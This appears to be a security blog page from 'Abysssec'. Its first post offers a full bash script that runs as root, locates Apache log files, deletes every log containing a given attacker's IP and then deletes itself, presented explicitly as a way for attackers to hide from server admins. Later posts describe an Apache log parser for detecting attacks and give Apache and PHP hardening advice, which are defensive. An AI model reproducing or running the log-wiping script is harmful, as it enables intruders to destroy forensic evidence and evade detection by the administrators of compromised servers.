Abysssec Security Researches

Hey ! I’m back  some exams of university :D and ….

Here is bash script for finding path of log files (Apache first and soon : all Logs) and deleting them for some attackers to be hidden from server admins !.Not bad ? Not good ? Where u use that !?.

At first we find path of directory contain some wanted logs and then searching line by line for log paths,finally founding attacker Ip in log files and removing log file. Be happy !

TEsTed On Debian etch4.0 and FreeBSD 6*

This is Rc 1. [download] : Log_f

and here is source code in bash :

#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
 
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
 
echo "Enter attacker IP"
read -e ip
 
if [ "`find $path -name apache >> $fl`" ];then
	echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
 
	if [ "`find $path -name apache2 >> $fl`" ];then
		echo "Founded Apache2 Config files"
	fi
fi 
 
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
 
#########################################################
if [ -f $1 ];then
let "f=f+1"
	if [ "`ls $1 | grep -F .conf`" ];then
	let "t=t+1"
	cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2  >> $log_path
	nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
	echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
	let "nt=nt+${nom[$t]}"
	let "j=$nt+$t"
	fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files  :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found  :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found  :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total  :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
 
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
	recurse $line
fi
let "l=l+1"
done
}
 
reader
 
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`"	\033[1;30m] $ip in	"
echo -n "Removing $line"
rm $line
 
if [ ! -f $line ];then
echo -e "\033[1;39m	... Done !\033[0;0m"
else
echo -e "\033[1;31m	...Failed!\033[1;0m"
fi
 
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line    "\033[1;39mFile Dose not exist......\033[1;30m]"
fi
 
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m"
 
log_path_reader
 
echo -en "\033[1;30mRemoving 				   $0	"
 
rm $fl $log_path $0
 
 if [ ! -f  $0 ];then
 	echo -e "\033[1;39m	... Done !\033[0;0m"
 else
 	echo -e "\033[1;31m	...Failed!\033[1;0m"
 fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"

—————————————————

daphne  :

Hi readers .

Thanks from mr.Amiri .

when we’re talking about the secret or hidden in server , Log files in unix , linux server , recorded everything . this script is usefull for [white hacker ] and manager to clear major log files .

Hello viewers
For long time I was looking for some codes for monitoring APACHE’s log
to detection some attacks and /or some     errors that can help server administrators to have a security solution for web servers.

So is so simple to find but its so dirty :d.
In  first stage script checks number of signatures of some of public attacks , you can change or/and edit them. After calculating errors script shows to you alarm or attention or …. messages and  here you decide  to what to want…
And at last total summary of logs with details was saved on path….
I want to write a better code as soon as possible ;)

here is quick log check’s snapshot

and check details

Last code was so slow !! and heavy .Here is fastest than beta-1 code .
I was check a log file ~ 150MB and getting results in 5 min.
It has been fastest as soon as possible ;) thanks.

Download Source code (beta 2 – cleaned code ! optimized – ):

download : log parser

This Post is a bit review to Apache security and not contain all details but i want write all of them.

When you decide to build a web server based on Open source Os for all web publishing -public or private- all the futures not needed . But sometimes some of them mus tow change carefully. We have to case of Apache using here :

Case 1 : In some cases you need to build a simulated ftp server based on HTTP protocol.

Case 2 : You need to build a MAIL server with HTTP interface. Such as HORD or SQURRIER MAIL.

SO what changes needed ?what kind of futures are usable here for Your jobs ?.

In default installation of Apache -as so useful web server – in a big range of open source operating systems you may see auto indexing and directory browsing , its good for HTTP server as FTP server but is it usable as HTTP-mail server ? Of curse response is NO .Why ? Its so simple .In case 1 you just need to give the permission to your users for reading files and browsing directories JUST!.And denied them to reading or browsing other directories . In case 2 the server design may have a complete configuration with case 1 .Here You must use an interpreter for your scripts and language .So is your directory browsing options may not denied is it possible ?.In example an attacker can change his directory to upper or can see most important data such as web server configurations and – or – some log files or a high level script kiddie could copy you password to anywhere .Now your web server is really crackable and an attacker can read your configurations and may change THEM !!. What did you do ? its so good question .

1- You can change permission of all unneeded directories to deny for other users and groups like :

“[root@server] # chmod -R 700 some directory that you want to hidden from other ”

2- Change the permission of your files to only readable for www and not executable – if you want to use HTML pages – and for script based pages

do “[root@server]# 644 *.php or other scripts
3- If your server pages is PHP you can change a bit the php.ini file

its in my machine :

[root@t4yt4n1 /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[root@t4yt4n1 /usr/home/t4z3v4r3d]#
open_basedir = /usr/local/www to the your www directory this is he way of blocking of some php-shell scripts lik c99.php.

what the php shells cand do ?

Hi this is 2′nd part of Apache security .
We want to look how to safe all of our scripts when we have some sites.
In share servers – commercial servers – we can secure our serer by some applications such as Cpanel Plesk or etc.
But how can we secure it by hand ?.Of curse its not so simple but its not hard to do.
Ok lets to see what we can do ?.Let look to this how to from an attacker.
Any of attacker want to get some information to doing a successful attack to any server.
But what is information exactly ?yes any information its correct !,all information may help the attacker to entering in to your server .
What kind of web server , web server version , Os version and type,mod ‘s of your web server is running  , server admin’s mail , dns-server , and …. is a good information to starting an attack.

some of the information can’t be hidden but some of may hidden !!!.
Ok we can change our server’s operating system name , web server name and type and version by some tools and mods – soon – .

All attacks methods are depend  to security of your server .

Ok we have some changes in our apache configuration.
But is it enough?. At the same way :what is the set of security settings for
Apache?.Security is a complex of invisible or bit notes.You can’t deny web viewers to looking your web contents in a little range of time .-in fact you can’t tell to users : Do brows my web contents only one time – but you can denied them to browsing all site in a little range of time  – or attacking such as directory traversal attacks or denial of service attack – .This attack can give a large amount of server resources .you can detect this attack and ban the attacker . Apache developed by some modules now, we can select our needed modules for protection.
Modules may be a helpful tools if you have enough information about how to work this module .Apache have 3 release version : 1.3.X and 2.0.X and 2.X all of this versions can using some modules.
For any platforms that you want to work on it may you need to some changes in configurations and giving resources to web server or changing in firewall rules and etc … . But you are module selector and you are lord of Apache world .Deciding which modules are needed is your job and tuning Apache is your art .
Its end of section one for now because I have no time to continue . i’ll be back very soon – iwant build a http server on my bsd box all of notes are really -In the next section we look for details .